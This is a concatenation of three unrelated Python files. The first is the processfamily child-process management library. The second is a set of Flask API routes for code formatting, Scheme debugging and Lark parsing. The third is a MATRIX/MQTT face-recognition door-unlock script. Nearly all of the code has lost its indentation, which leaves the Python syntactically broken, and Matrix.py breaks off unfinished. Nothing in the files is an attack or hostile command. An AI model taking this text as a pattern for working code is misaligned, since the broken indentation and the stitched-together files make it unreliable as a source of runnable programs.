__init__.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import next
from builtins import range
from builtins import *
from builtins import object
__author__ = 'matth'
import threading
import traceback
import sys
import subprocess
import time
import uuid
import logging
import json
import argparse
import shlex
import os
import jsonrpc
import queue
import pkgutil
from processfamily.threads import stop_threads
from processfamily.processes import kill_process, process_exists, set_process_affinity, cpu_count
import signal
import functools
if sys.platform.startswith('win'):
import win32job
import win32api
import win32security
import pywintypes
import winerror
from processfamily import win32Popen
else:
from . import ctypes_prctl as prctl
SIGNAL_NAMES = {getattr(signal, k): k for k in dir(signal) if k.startswith("SIG")}
logger = logging.getLogger("processfamily")
class JobObjectAssignError(Exception):
def __init__(self, message, cause, already_in_job):
super(JobObjectAssignError, self).__init__(message)
self.cause = cause
self.already_in_job = already_in_job
def start_child_process(child_process_instance):
host = _ChildProcessHost(child_process_instance)
host.run()
def _traceback_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception(exc_info[0], exc_info[1], exc_info[2]))
def _exception_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
class ChildProcess(object):
"""
Subclass this for the implementation of the child process. You must also include an appropriate main entry point.
You should do something like this in your implementation:
if __name__ == '__main__':
start_child_process(MyChildProcess())
"""
def init(self):
"""
Do any initialisation. The parent will wait for this to be complete before considering the process to be
running.
"""
def run(self):
"""
Method representing the thread's activity. You may override this method in a subclass.
This will be called from the process's main method, once initialisation is complete.
"""
def stop(self, timeout=None):
"""
Will be called from a new thread. The process should do its best to shut down cleanly when this is called.
:param timeout: The number of milliseconds that the parent process will wait before killing this process.
"""
class _ArgumentParser(argparse.ArgumentParser):
def exit(self, status=0, message=None):
pass
def error(self, message):
raise ValueError(message)
class _ChildProcessHost(object):
def __init__(self, child_process):
self.child_process = child_process
self.command_arg_parser = _ArgumentParser(description='Execute an RPC method on the child')
self.command_arg_parser.add_argument('method')
self.command_arg_parser.add_argument('--id', '-i', dest='json_rpc_id')
self.command_arg_parser.add_argument('--params', '-p', dest='params')
self._started_event = threading.Event()
self._stopped_event = threading.Event()
self.dispatcher = jsonrpc.Dispatcher()
self.dispatcher["stop"] = self._respond_immediately_for_stop
self.dispatcher["wait_for_start"] = self._wait_for_start
self.stdin = sys.stdin
sys.stdin = open(os.devnull, 'r')
self.stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._stdout_lock = threading.RLock()
self._sys_in_thread = threading.Thread(target=self._sys_in_thread_target, name="pf_%s_stdin" % repr(child_process))
self._sys_in_thread.daemon = True
self._should_stop = False
def run(self):
#This is in the main thread
try:
self._sys_in_thread.start()
try:
if self._should_stop:
return
self.child_process.init()
finally:
self._started_event.set()
if self._should_stop:
return
self.child_process.run()
except Exception as e:
logger.error("Error: %s\n%s", e, _traceback_str())
raise
finally:
self._stopped_event.set()
def _wait_for_start(self):
self._started_event.wait()
return 0
def _sys_in_thread_target(self):
should_continue = True
while should_continue:
try:
line = self.stdin.readline()
if not line:
should_continue = False
else:
try:
should_continue = self._handle_command_line(line)
except Exception as e:
logger.error("Error handling processfamily command on input: %s\n%s", e, _traceback_str())
except Exception as e:
logger.error("Exception reading input for processfamily: %s\n%s", e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get into a tight loop which I want to avoid
time.sleep(5)
self._should_stop = True
self._started_event.wait(1)
stop_thread = threading.Thread(target=self._stop_thread_target, name="pf_%s_stop" % repr(self.child_process))
stop_thread.daemon = True
stop_thread.start()
self._stopped_event.wait(3)
#Give it another ten seconds to stop
#This will not actually stop the process from terminating as this is a daemon thread
time.sleep(10)
#Now try and force things
stop_threads()
def _stop_thread_target(self):
try:
self.child_process.stop()
except Exception as e:
logger.error("Error handling processfamily stop command: %s\n%s", e, _traceback_str())
def _respond_immediately_for_stop(self):
logger.info("Received stop instruction from parent process")
self._should_stop = True
return 0
def _send_response(self, rsp):
if rsp:
if '\n' in rsp:
raise ValueError('Invalid response string (new lines are not allowed): "%r"' % rsp)
with self._stdout_lock:
logger.debug("Sending response: %s", rsp)
self.stdout.write("%s\n"%rsp)
self.stdout.flush()
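# The parent drives this child with one command per line on stdin. A line may be either a
# shell-style command parsed by command_arg_parser, e.g. (illustrative):
#     wait_for_start --id 1
# or a raw JSON-RPC 2.0 request, e.g.:
#     {"jsonrpc": "2.0", "method": "stop", "id": "1"}
# Responses go back to the real stdout as single-line JSON-RPC responses via _send_response.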
def _handle_command_line(self, line):
try:
line = line.strip()
if not line.startswith('{'):
args = self.command_arg_parser.parse_args(shlex.split(line))
request = {
'jsonrpc': '2.0',
'method': args.method,
}
if args.json_rpc_id:
request['id'] = args.json_rpc_id
if args.params:
request['params'] = args.params
line = json.dumps(request)
else:
request = json.loads(line)
request_id = json.dumps(request.get("id"))
except Exception as e:
logger.error("Error parsing command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": -32700, "message": "Parse error"}, "id": null}')
return True
if request.get('method') == 'stop':
#I have to process the stop method in this thread!
#This is a bit lame - but I'm just using this to form a valid response and send it immediately
#
self._dispatch_rpc_call(line, request_id)
return False
else:
#Others should be processed from a new thread:
threading.Thread(target=self._dispatch_rpc_call_thread_target, args=(line, request_id)).start()
return True
def _dispatch_rpc_call(self, line, request_id):
try:
rsp = jsonrpc.JSONRPCResponseManager.handle(line, self.dispatcher)
if rsp is not None:
self._send_response(rsp.json)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": 32603, "message": "Error handling request"}, "id": %s}'%request_id)
def _dispatch_rpc_call_thread_target(self, line, request_id):
try:
self._dispatch_rpc_call(line, request_id)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
class ChildCommsStrategy(object):
"""
A proxy to the child process that can be used from the parent process
"""
MONITOR_STDOUT = True
SENDS_STDOUT_RESPONSES = False
CAN_WAIT_FOR_TERMINATE = True
def __init__(self, process_instance, echo_std_err, child_index, process_family):
if type(self) == ChildCommsStrategy:
raise NotImplementedError("A concrete strategy needs to be chosen")
self.process_family = process_family
self.child_index = child_index
self.name = self.process_family.get_child_name(child_index)
self._process_instance = process_instance
self._rsp_queues_lock = threading.RLock()
self._rsp_queues = {}
self._stdin_lock = threading.RLock()
self.echo_std_err = echo_std_err
if self.echo_std_err:
self._sys_err_thread = threading.Thread(target=self._sys_err_thread_target, name="pf_%s_stderr" % self.name)
self._sys_err_thread.daemon = True
self._sys_err_thread.start()
if self.MONITOR_STDOUT:
self._sys_out_thread = threading.Thread(target=self._sys_out_thread_target, name="pf_%s_stdout" % self.name)
self._sys_out_thread.daemon = True
self._sys_out_thread.start()
def __repr__(self):
return "%s (%s: %r)" % (self.name, type(self).__name__, self._process_instance)
@property
def pid(self):
return self._process_instance.pid
def is_stopped(self):
"""return whether the governed process has stopped"""
return self._process_instance.poll() is not None
@staticmethod
def get_popen_streams(echo_std_err):
"""Returns kwargs for stdin, stdout and stderr to pass to subprocess.Popen"""
PIPE = subprocess.PIPE
streams = {"stdin": PIPE, "stdout": PIPE, "stderr": PIPE}
if not echo_std_err:
streams["stderr"] = open(os.devnull, 'w')
return streams
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
yield
yield
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
yield
yield
def _sys_err_thread_target(self):
while True:
try:
line = self._process_instance.stderr.readline()
if not line:
break
try:
self.process_family.handle_sys_err_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stderr output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stderr output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get into a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stderr closed")
def _sys_out_thread_target(self):
try:
while True:
try:
line = self._process_instance.stdout.readline()
if not line:
break
try:
if self.SENDS_STDOUT_RESPONSES:
self._handle_response_line(line)
else:
self.process_family.handle_sys_out_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stdout output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stdout output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get into a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stdout closed - expecting termination")
start_time = time.time()
while self._process_instance.poll() is None and time.time() - start_time < 5:
time.sleep(0.1)
if self.echo_std_err:
self._sys_err_thread.join(5)
if self._process_instance.poll() is None:
logger.error("Stdout stream closed for %s, but process is not terminated (PID:%s)", self.name, self.pid)
else:
logger.info("%s terminated (return code: %d)", self.name, self._process_instance.returncode)
finally:
#Unstick any waiting command threads:
with self._rsp_queues_lock:
for q in list(self._rsp_queues.values()):
if q.empty():
q.put_nowait(None)
self._rsp_queues = None
def _handle_response_line(self, line):
rsp = json.loads(line)
if "id" in rsp:
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
rsp_queue = self._rsp_queues.get(rsp["id"], None)
if rsp_queue is not None:
rsp_queue.put_nowait(rsp)
#We need to keep the job handle in a global variable so that it can't go out of scope and result in our process
#being killed
_global_process_job_handle = None
CPU_AFFINITY_STRATEGY_NONE = 0
CPU_AFFINITY_STRATEGY_CHILDREN_ONLY = 1
CPU_AFFINITY_STRATEGY_PARENT_INCLUDED = 2
class NoCommsStrategy(ChildCommsStrategy):
MONITOR_STDOUT = False
CAN_WAIT_FOR_TERMINATE = False
@staticmethod
def get_popen_streams(echo_std_err):
"""Returns kwargs for stdin, stdout and stderr to pass to subprocess.Popen"""
return {"stdin": None, "stdout": None, "stderr": None}
class ClosePipesCommsStrategy(ChildCommsStrategy):
def stop_child(self, end_time):
p = self._process_instance
logger.info("Closing stdin for process %r", self)
try:
p.stdin.close()
except Exception as e:
logger.warning("Failed to close child process input stream with PID %s: %s\n%s", self.pid, e, _traceback_str())
yield
yield
class ProcessFamilyRPCProtocolStrategy(ChildCommsStrategy):
SENDS_STDOUT_RESPONSES = True
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
response_id = str(uuid.uuid4())
response = None
try:
yield self._send_command_req(response_id, "wait_for_start")
response = self._wait_for_response(response_id, end_time - time.time())
yield response
finally:
self._cleanup_queue(response_id)
if response is None:
poll_result = self._process_instance.poll()
if poll_result is None:
logger.error("Timed out waiting for %s (PID %d) to complete initialisation",
self.name, self.pid)
else:
logger.error("%s terminated with response code %d before completing initialisation",
self.name, poll_result)
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
response_id = str(uuid.uuid4())
try:
yield self._send_command_req(response_id, "stop")
yield self._wait_for_response(response_id, end_time - time.time())
finally:
self._cleanup_queue(response_id)
def _send_command_req(self, response_id, command, params=None):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
self._rsp_queues[response_id] = queue.Queue()
cmd = {
"method": command,
"id": response_id,
"jsonrpc": "2.0"
}
if params is not None:
cmd["params"] = params
req = json.dumps(cmd)
if '\n' in req:
raise ValueError('Invalid request string (new lines are not allowed): "%r"' % req)
try:
with self._stdin_lock:
self._process_instance.stdin.write(("%s\n" % req).encode('utf8'))
self._process_instance.stdin.flush()
if command == 'stop':
#Now close the stream - we are done
self._process_instance.stdin.close()
except Exception as e:
if self._process_instance.poll() is None:
#The process is running, so something is wrong:
raise
def _wait_for_response(self, response_id, timeout):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return None
q = self._rsp_queues.get(response_id, None)
if q is None:
return None
try:
if timeout <= 0:
return q.get_nowait()
else:
return q.get(True, timeout)
except queue.Empty as e:
return None
def _cleanup_queue(self, response_id):
with self._rsp_queues_lock:
if self._rsp_queues is not None:
self._rsp_queues.pop(response_id, None)
class SignalStrategy(ChildCommsStrategy):
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
signum = self.process_family.CHILD_STOP_SIGNAL
signal_name = SIGNAL_NAMES.get(signum, str(signum))
logger.info("Sending signal %s to process %r", signal_name, self)
os.kill(self.pid, signum)
yield
yield
class ForkingChildSignalStrategy(SignalStrategy):
# requires the process_family instance to have a pid_file attribute added...
MONITOR_STDOUT = False
@property
def pid(self):
return getattr(self, "forked_pid", None) or self._process_instance.pid
def is_stopped(self):
return not process_exists(self.pid)
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
while (self._process_instance.poll() is None) and time.time() < end_time:
# subprocess.Popen.wait() only gained a timeout argument in Python 3.3, so poll in a loop instead
time.sleep(0.05)
yield
if os.path.exists(self.process_family.pid_file):
with open(self.process_family.pid_file, 'rb') as f:
pid_str = f.read().strip()
self.forked_pid = int(pid_str) if pid_str and pid_str.isdigit() else None
if not self.forked_pid:
logger.error("Unexpected pid found in file %s for %r: %r", self.process_family.pid_file, self, pid_str)
yield
else:
self.forked_pid = None
logger.error("PID file %s was not created: Child for %r probably failed to start", self.process_family.pid_file, self)
raise ValueError("Could not find child process for %s (probably failed to start)" % self.name)
CHILD_COMMS_STRATEGY_NONE = NoCommsStrategy
CHILD_COMMS_STRATEGY_PIPES_CLOSE = ClosePipesCommsStrategy
CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL = ProcessFamilyRPCProtocolStrategy
CHILD_COMMS_STRATEGY_SIGNAL = SignalStrategy
class ProcessFamily(object):
"""
Manages the launching of a set of child processes
"""
ECHO_STD_ERR = False
CPU_AFFINITY_STRATEGY = CPU_AFFINITY_STRATEGY_PARENT_INCLUDED
CLOSE_FDS = True
CHILD_STOP_SIGNAL = signal.SIGINT
WIN_PASS_HANDLES_OVER_COMMANDLINE = False
WIN_USE_JOB_OBJECT = True
LINUX_USE_PDEATHSIG = True
NEW_PROCESS_GROUP = True
CHILD_COMMS_STRATEGY = CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL
def __init__(self, child_process_module_name=None, number_of_child_processes=None, run_as_script=True):
self.child_process_module_name = child_process_module_name
self.run_as_script = run_as_script
self.cpu_count = cpu_count()
if number_of_child_processes:
self.number_of_child_processes = number_of_child_processes
else:
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
self.number_of_child_processes = self.cpu_count-1
elif self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_CHILDREN_ONLY:
self.number_of_child_processes = self.cpu_count
else:
self.number_of_child_processes = self.cpu_count
self.child_processes = []
self._child_process_group_id = None
def get_child_process_cmd(self, child_number):
"""
:param child_number zero-indexed
"""
if self.run_as_script:
return [self.get_sys_executable(), self._find_module_filename(self.child_process_module_name)]
else:
return [self.get_sys_executable(), '-m', self.child_process_module_name]
def get_sys_executable(self):
return sys.executable
def get_job_object_name(self):
return "py_processfamily_%s" % (str(uuid.uuid4()))
def get_child_name(self, i):
return 'Child Process %d' % (i+1)
def handle_sys_err_line(self, child_index, line):
sys.stderr.write(line)
def handle_sys_out_line(self, child_index, line):
"""
This is only relevant if CHILD_COMMS_STRATEGY_PIPES_CLOSE is used
"""
pass
def _add_to_job_object(self):
global _global_process_job_handle
if _global_process_job_handle is not None:
#This means that we are creating another process family - we'll all be in the same job
return
already_in_job = win32job.IsProcessInJob(win32api.GetCurrentProcess(), None)
#Create a new job and put us in it before we create any children
logger.debug("Creating job object and adding parent process to it")
security_attrs = win32security.SECURITY_ATTRIBUTES()
security_attrs.bInheritHandle = 0
_global_process_job_handle = win32job.CreateJobObject(security_attrs, self.get_job_object_name())
extended_info = win32job.QueryInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation, extended_info)
try:
win32job.AssignProcessToJobObject(_global_process_job_handle, win32api.GetCurrentProcess())
except Exception as e:
winv = sys.getwindowsversion()
logger.error("Error raised during assignment of the current process to a new job object. " +\
"The process %s already in a job. " +\
"The windows version is %d.%d.\nError: %s",
"is" if already_in_job else "is not",
winv.major,
winv.minor,
_exception_str())
if already_in_job and not ((winv.major, winv.minor) >= (6, 2)):
raise JobObjectAssignError("On Windows versions older than Windows 8 / Windows Server 2012, ProcessFamily relies on the parent process NOT being in a job already", e, already_in_job)
raise JobObjectAssignError("Error raised during assignment of the current process to a new job object.", e, already_in_job)
logger.debug("Added to job object")
def get_Popen_kwargs(self, i, **kwargs):
popen_streams = self.CHILD_COMMS_STRATEGY.get_popen_streams(self.ECHO_STD_ERR)
kwargs.update(popen_streams)
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
kwargs['timeout_for_child_stream_duplication_event'] = None
if self.NEW_PROCESS_GROUP:
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
return kwargs
else:
kwargs['preexec_fn'] = functools.partial(self.pre_exec_fn, i)
return kwargs
def get_Popen_class(self):
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Using HandlesOverCommandLinePopen")
return win32Popen.HandlesOverCommandLinePopen
else:
logger.debug("Using ProcThreadAttributeHandleListPopen")
return win32Popen.ProcThreadAttributeHandleListPopen
else:
return subprocess.Popen
def pre_exec_fn(self, i):
#This is called after fork(), but before exec()
#Assign this new process to a new group
if self.NEW_PROCESS_GROUP:
os.setpgrp()
if self.LINUX_USE_PDEATHSIG:
prctl.set_pdeathsig(self.get_pdeath_sig())
def get_pdeath_sig(self):
return signal.SIGKILL
def set_parent_affinity_mask(self):
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
set_process_affinity({0})
def set_child_affinity_mask(self, pid, child_index):
i = child_index+1 if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED else child_index
set_process_affinity({i%self.cpu_count}, pid=pid)
def start(self, timeout=30):
if self.child_processes:
raise Exception("Invalid state: start() can only be called once")
s = time.time()
if self.CPU_AFFINITY_STRATEGY:
self.set_parent_affinity_mask()
if sys.platform.startswith('win') and self.WIN_USE_JOB_OBJECT:
self._add_to_job_object()
self.child_processes = []
for i in range(self.number_of_child_processes):
logger.info("Starting %s", self.get_child_name(i))
cmd = self.get_child_process_cmd(i)
logger.debug("Commandline for %s: %s", self.get_child_name(i), json.dumps(cmd))
p = self.get_Popen_class()(cmd, **self.get_Popen_kwargs(i, close_fds=self.CLOSE_FDS))
if self.CPU_AFFINITY_STRATEGY and p.poll() is None:
try:
self.set_child_affinity_mask(p.pid, i)
except Exception as e:
logger.error("Unable to set affinity for %s process %d: %s", self.get_child_name(i), p.pid, e)
self.child_processes.append(self.CHILD_COMMS_STRATEGY(p, self.ECHO_STD_ERR, i, self))
if sys.platform.startswith('win') and self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Waiting for child stream duplication events")
for c in self.child_processes:
c._process_instance.wait_for_child_stream_duplication_event(timeout=timeout-(time.time()-s)-3)
self.wait_for_start(timeout - (time.time()-s))
logger.info("All child processes initialised with strategy %s", self.CHILD_COMMS_STRATEGY.__name__)
def wait_for_start(self, timeout):
"""Waits (a maximum of timeout) until all children of process_family have started"""
end_time = time.time() + timeout
command_processes = []
try:
for child_process in self.child_processes:
command_processes.append(child_process.monitor_child_startup(end_time))
for c in command_processes:
# ping the process
next(c)
# results
return [next(c) for c in command_processes]
finally:
for c in command_processes:
c.close()
def stop(self, timeout=30, wait=True):
"""Stops children. Returns the number that required termination (or None if wait=False)"""
clean_timeout = timeout - 1
start_time = time.time()
self.send_stop(clean_timeout)
if wait:
remaining_time = timeout - (time.time() - start_time)
return self.wait_for_stop_and_then_terminate(timeout=remaining_time)
def send_stop(self, timeout):
"""Instructs all process_family children to stop"""
end_time = time.time() + timeout
command_processes = []
try:
for child_process in self.child_processes:
if not child_process.is_stopped():
command_processes.append(child_process.stop_child(end_time))
for c in command_processes:
# send the stop command
next(c)
# results
return [next(c) for c in command_processes]
finally:
for c in command_processes:
c.close()
def wait_for_stop_and_then_terminate(self, timeout=30):
"""Waits for children to stop, but terminates them if necessary. Returns the number terminated"""
clean_timeout = timeout - 1
start_time = time.time()
if self.CHILD_COMMS_STRATEGY.CAN_WAIT_FOR_TERMINATE:
logger.debug("Waiting for child processes to terminate")
self._wait_for_children_to_terminate(start_time, clean_timeout)
num_terminated = 0
if self.child_processes:
#We've nearly run out of time - let's try and kill them:
logger.info("Attempting to kill child processes")
for p in list(self.child_processes):
try:
num_terminated += 1
if process_exists(p.pid):
kill_process(p.pid)
except Exception as e:
logger.warning("Failed to kill child process %s with PID %s: %s\n%s", p.name, p.pid, e, _traceback_str())
self._wait_for_children_to_terminate(start_time, timeout)
return num_terminated
def _wait_for_children_to_terminate(self, start_time, timeout):
first_run = True
while self.child_processes and (first_run or time.time() - start_time < timeout):
for p in list(self.child_processes):
if p.is_stopped():
self.child_processes.remove(p)
if first_run:
first_run = False
else:
time.sleep(0.1)
def _find_module_filename(self, modulename):
"""finds the filename of the module with the given name (supports submodules)"""
loader = pkgutil.find_loader(modulename)
if loader is None:
raise ImportError(modulename)
search_path = loader.get_filename(modulename)
return search_path
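A minimal usage sketch of the API above, assuming a hypothetical child module `myapp.worker` and a hypothetical parent script (the module name, class names and child count are illustrative, not part of the processfamily source):

# myapp/worker.py -- hypothetical child module
import time
from processfamily import ChildProcess, start_child_process

class MyChildProcess(ChildProcess):
    def init(self):
        # load configuration, open sockets, etc.
        self.keep_running = True

    def run(self):
        # main loop of the child process
        while self.keep_running:
            time.sleep(1)

    def stop(self, timeout=None):
        # called from a separate thread when the parent asks us to stop
        self.keep_running = False

if __name__ == '__main__':
    start_child_process(MyChildProcess())

# parent side -- hypothetical
from processfamily import ProcessFamily

class MyFamily(ProcessFamily):
    ECHO_STD_ERR = True

family = MyFamily(child_process_module_name="myapp.worker",
                  number_of_child_processes=2, run_as_script=False)
family.start(timeout=30)
# ... do the parent's own work ...
family.stop(timeout=30)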
language_apis.py
import re
from json import dumps
from multiprocessing import Process, Queue
import black
import requests
from flask import jsonify, request
from lark import Lark, LarkError, Token, Tree, UnexpectedEOF
from IGNORE_scheme_debug import (
Buffer,
SchemeError,
debug_eval,
scheme_read,
tokenize_lines,
)
from formatter import scm_reformat
def create_language_apis(app):
# python
@app.route("/api/pytutor", methods=["POST"])
def pytutor_proxy():
data = {
"user_script": request.form["code"],
# "options_json": r'{"cumulative_mode":true,"heap_primitives":false}',
}
if "options_json" in request.form:
data["options_json"] = request.form["options_json"]
response = requests.post(
"http://pythontutor.com/web_exec_py3.py",
data=data,
)
return response.text
@app.route("/api/black", methods=["POST"])
def black_proxy():
try:
return jsonify(
{
"success": True,
"code": black.format_str(
request.form["code"], mode=black.FileMode()
)
+ "\n",
}
)
except Exception as e:
return jsonify({"success": False, "error": repr(e)})
# scheme
@app.route("/api/scm_debug", methods=["POST"])
def scm_debug():
code = request.form["code"]
q = Queue()
p = Process(target=scm_worker, args=(code, q))
p.start()
p.join(10)
if not q.empty():
return jsonify(q.get())
@app.route("/api/scm_format", methods=["POST"])
def scm_format():
try:
return jsonify(
{"success": True, "code": scm_reformat(request.form["code"])}
)
except Exception as e:
return jsonify({"success": False, "error": repr(e)})
@app.route("/api/lark_run", methods=["POST"])
def lark_run():
grammar = request.form["grammar"]
import_regex = r"%import common\.([a-zA-Z]*)"
imports = [match.group(1) for match in re.finditer(import_regex, grammar)]
grammar = re.sub(r"%import common\.[a-zA-Z]*", "", grammar)
if "%import" in grammar:
return jsonify(dict(error="Arbitrary %imports are not supported"))
for terminal in imports:
grammar += f"""
%import common.{terminal}
"""
text = request.form.get("text", None)
try:
parser = Lark(grammar, start="start")
except LarkError as e:
return jsonify(dict(error=str(e)))
if text is None:
return jsonify(dict(success=True))
try:
parse_tree = parser.parse(text)
except UnexpectedEOF as e:
return jsonify(
dict(
error=str(e)
+ "[Hint: use the .begin and .end commands to input multiline strings]\n"
)
)
except LarkError as e:
return jsonify(dict(error=str(e)))
def export(node):
if isinstance(node, Tree):
return [
node.data,
[export(child) for child in node.children],
]
elif isinstance(node, Token):
return [repr(node.value)]
else:
return [repr(node)]
return jsonify(
success=True, parsed=export(parse_tree), repr=parse_tree.pretty()
)
def scm_worker(code, queue):
try:
buff = Buffer(tokenize_lines(code.split("\n")))
exprs = []
while buff.current():
exprs.append(scheme_read(buff))
out = debug_eval(exprs)
except (SyntaxError, SchemeError) as err:
queue.put(dumps(dict(error=str(err))))
except:
queue.put(dumps(dict(error="An internal error occurred.")))
raise
else:
queue.put(out)
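The routes above are registered on whatever Flask app is passed in. A minimal wiring sketch, assuming this module is importable as `language_apis` (the port is arbitrary):

from flask import Flask
from language_apis import create_language_apis

app = Flask(__name__)
create_language_apis(app)

if __name__ == "__main__":
    app.run(port=5000)  # development server only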
Matrix.py
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 24 12:26:19 2019
@author: VAI
"""
import paho.mqtt.client as mqtt
import json
import boto3
import cv2
## Set Initial Variables ##
import os # Miscellaneous operating system interface
import zmq # Asynchronous messaging framework
import time # Time access and conversions
from random import randint # Random numbers
import sys # System-specific parameters and functions
# Handy function for connecting to the Error port
from utils import register_error_callback
from matrix_io.proto.malos.v1 import driver_pb2 # MATRIX Protocol Buffer driver library
from matrix_io.proto.malos.v1 import io_pb2 # MATRIX Protocol Buffer sensor library
from multiprocessing import Process, Manager, Value # Allow for multiple processes at once
from zmq.eventloop import ioloop, zmqstream  # Asynchronous events through ZMQ
matrix_ip = '127.0.0.1' # Local device ip
everloop_port = 20021 # Driver Base port
led_count = 0 # Amount of LEDs on MATRIX device
flag=False
Color=""
def compare_faces(sourceFile, targetFile):
client=boto3.client('rekognition')
imageSource=open(sourceFile,'rb')
imageTarget=open(targetFile,'rb')
response=None
response=client.compare_faces(SimilarityThreshold=80,
SourceImage={'Bytes': imageSource.read()},
TargetImage={'Bytes': imageTarget.read()})
for faceMatch in response['FaceMatches']:
position = faceMatch['Face']['BoundingBox']
similarity = str(faceMatch['Similarity'])
print('The face at ' +
str(position['Left']) + ' ' +
str(position['Top']) +
' matches with ' + similarity + '% confidence')
imageSource.close()
imageTarget.close()
return len(response['FaceMatches'])
def on_connect(client, userdata, flags, rc):
print("rc: " + str(rc))
def on_message(client, obj, msg):
global flag
global Color
topic=msg.topic
if(topic=="esp/test"):
print("ESP Online")
else:
y = json.loads(msg.payload.decode())
print(y["intent"]["intentName"])
print(y["slots"][0]["value"]["value"])
lock=y["slots"][0]["value"]["value"]
flag=True
if(lock=="open" or lock=="unlock"):
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
cv2.imwrite("image.jpg", frame)
target_file='image.jpg'
source_file='myface.jpg'
face_matches=compare_faces(source_file, target_file)
if(face_matches>0):
print("Yes my lord")
Color="green"
else:
Color="red"
else:
Color="none"
def on_publish(client, obj, mid):
print("mid: " + str(mid))
def on_subscribe(client, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(client, obj, level, string):
#print(string)
...
def ping_socket():
# Define zmq socket
context = zmq.Context()
# Create a Pusher socket
ping_socket = context.socket(zmq.PUSH)
# Connect to the socket
ping_socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port+1))
# Ping with empty string to let the driver know we're still listening
ping_socket.send_string('')
def everloop_error_callback(error):
# Log error
print('{0}'.format(error))
## DATA UPDATE PORT ##
def update_socket():
# Define zmq socket
context = zmq.Context()
# Create a Subscriber socket
socket = context.socket(zmq.SUB)
# Connect to the Data Update port
socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port+3))
# Connect Subscriber to Error port
socket.setsockopt(zmq.SUBSCRIBE, b'')
# Create the stream to listen to data from port
stream = zmqstream.ZMQStream(socket)
# Function to update LED count and close connection to the Data Update Port
def updateLedCount(data):
# Extract data and pass into led_count global variable
global led_count
led_count = io_pb2.LedValue().FromString(data[0]).green
# Log LEDs
print('{0} LEDs counted'.format(led_count))
# If LED count obtained
if led_count > 0:
# Close Data Update Port connection
ioloop.IOLoop.instance().stop()
print('LED count obtained. Disconnecting from data publisher {0}'.format(everloop_port+3))
# Call updateLedCount() once data is received
stream.on_recv(updateLedCount)
# Log and begin event loop for ZMQ connection to Data Update Port
print('Connected to data publisher with port {0}'.format(everloop_port+3))
ioloop.IOLoop.instance().start()
## BASE PORT ##
def config_socket(ledCount):
global flag
global Color
# Define zmq socket
context = zmq.Context()
# Create a Pusher socket
socket = context.socket(zmq.PUSH)
# Connect Pusher to configuration socket
socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port))
rc = 0
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
client = mqtt.Client()
client.connect("raspberrypi.local", 1883)
client.subscribe("hermes/nlu/intentParsed")
client.subscribe("esp/test")
client.on_message = on_message
